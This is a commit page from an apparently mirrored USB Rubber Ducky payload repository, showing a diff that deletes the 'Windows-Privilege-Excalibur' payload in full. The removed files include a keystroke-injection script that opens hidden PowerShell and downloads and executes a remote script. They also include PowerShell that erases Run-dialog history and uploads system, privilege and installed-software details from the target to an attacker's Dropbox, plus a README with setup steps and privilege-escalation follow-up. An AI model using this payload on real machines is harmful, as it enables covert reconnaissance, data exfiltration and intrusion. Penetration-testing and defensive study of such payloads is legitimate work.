hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Delete payloads/library/exfiltration/Windows-Privilege-Excalibur directory

pull/255/head
Julien Morice 2023-03-13 00:34:01 +01:00 committed by GitHub
parent 2727fc578f
commit ecc2fe1fd8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 0 additions and 127 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
payloads/library/exfiltration/Windows-Privilege-Excalibur/.ps1
View File

@ -1,6 +0,0 @@
#Replace <APP_KEY> with the actual "App Key" of your app.
#Replace <APP_SECRET> with the actual "App Secret" of your app.
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "# System Information #`n $(SYSTEMINFO | Out-String) `n# User Information #`n $(WHOAMI /ALL | Out-String) `n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null

57
payloads/library/exfiltration/Windows-Privilege-Excalibur/README.md
View File

@ -1,57 +0,0 @@
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Privilege+Excalibur+🪟🗡️">
</a>
</h1>
## Description
This payload exfiltrates Windows system information, user information (such as privileges), and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
## Usage
### Setup
- **Configure your Dropbox application**
- Create a Dropbox account.
- [Create a Dropbox "App"](https://www.dropbox.com/developers/apps/create) with a "Scoped access" API and a "Full Dropbox" access.
- Go to the settings of this app and write down your "App key" and "App secret".
*These are your "<APP_KEY>" and "<APP_SECRET>".*
- Next, go to the "Permissions" tab and enable the "files.metadata.write" and "files.content.write" permissions.
- After that, open this link in your browser *(values between brackets must be changed)*.
```
https://www.dropbox.com/oauth2/authorize?client_id=<APP_KEY>&token_access_type=offline&response_type=code
```
- Connect your application, allow its permissions, and note the code it gives you.
*This is your "<APP_CODE>".*
- Open a command prompt and run this command *(values between brackets must be changed)*.
```
curl https://api.dropbox.com/oauth2/token -d code=<APP_CODE> -d grant_type=authorization_code -u <APP_KEY>:<APP_SECRET>
```
- Note the "refresh_token" value of the result.
*This is your "<REFRESH_TOKEN>".*
- **Prepare your payload**
- Download the Powershell script ".ps1".
- Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application.
- Upload your modified ".ps1" file to Dropbox and copy the upload link.
- Replace the end of the link from "?dl=0" to "?dl=1"
*This is your "<DOWNLOAD_LINK>".*
- Download the "payload.txt" file.
- Edit it to include your <DOWNLOAD_LINK>.
### Analysis
Once you have your report file, you can easily scan it for vulnerabilities or misconfigurations that would allow you to elevate your privileges on the target system.
You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to look for missing patches on the system.
You can check if the user has dangerous permissions that can be exploited.
The report also contains a list of software installed on the target computer, which allows you to search for exploits that already exist on this software, via sites such as [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com).
---
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*

17
payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt
View File

@ -1,17 +0,0 @@
REM Title: Windows Privilege Excalibur
REM Author: Who-Is-Julien
REM Description: This payload exfiltrates Windows system information and installed programs from the target computer to DropBox cloud storage for subsequent privilege escalation analysis.
REM Target: Windows 10, 11
REM Replace DOWNLOAD_LINK with the actual download link of the script.
DEFINE DOWNLOAD_LINK example.com
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
STRING DOWNLOAD_LINK
STRING ; iex $pl
DELAY 500
ENTER

47
payloads/library/exfiltration/Windows-Privilege-Excalibur/source.ps1
View File

@ -1,47 +0,0 @@
#Replace <APP_KEY> with the actual "App Key" of your app.
#Replace <APP_SECRET> with the actual "App Secret" of your app.
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
#Clear windows run dialog history
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
#Define the headers required for the access token request
$headers = @{
"Content-Type" = "application/x-www-form-urlencoded"
}
#Define the parameters for the access token request
$body = @{
grant_type = "refresh_token"
refresh_token = "<REFRESH_TOKEN>"
client_id = "<APP_KEY>"
client_secret = "<APP_SECRET>"
}
#Request an access token from Dropbox using the body and headers defined above
$access_token_response = Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers $headers -Body $body
$access_token = $access_token_response.access_token
#Define headers for the file upload
$headers = @{
"Authorization" = "Bearer $access_token"
"Content-Type" = "application/octet-stream"
"Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'
}
#Define the report for the file upload
$body = "# System Information #`n $(SYSTEMINFO | Out-String)"
$body += "`n# User Information #`n $(WHOAMI /ALL | Out-String)"
$body += "`n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
#Upload the report to Dropbox using the headers and body defined above
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers $headers -Body $body | Out-Null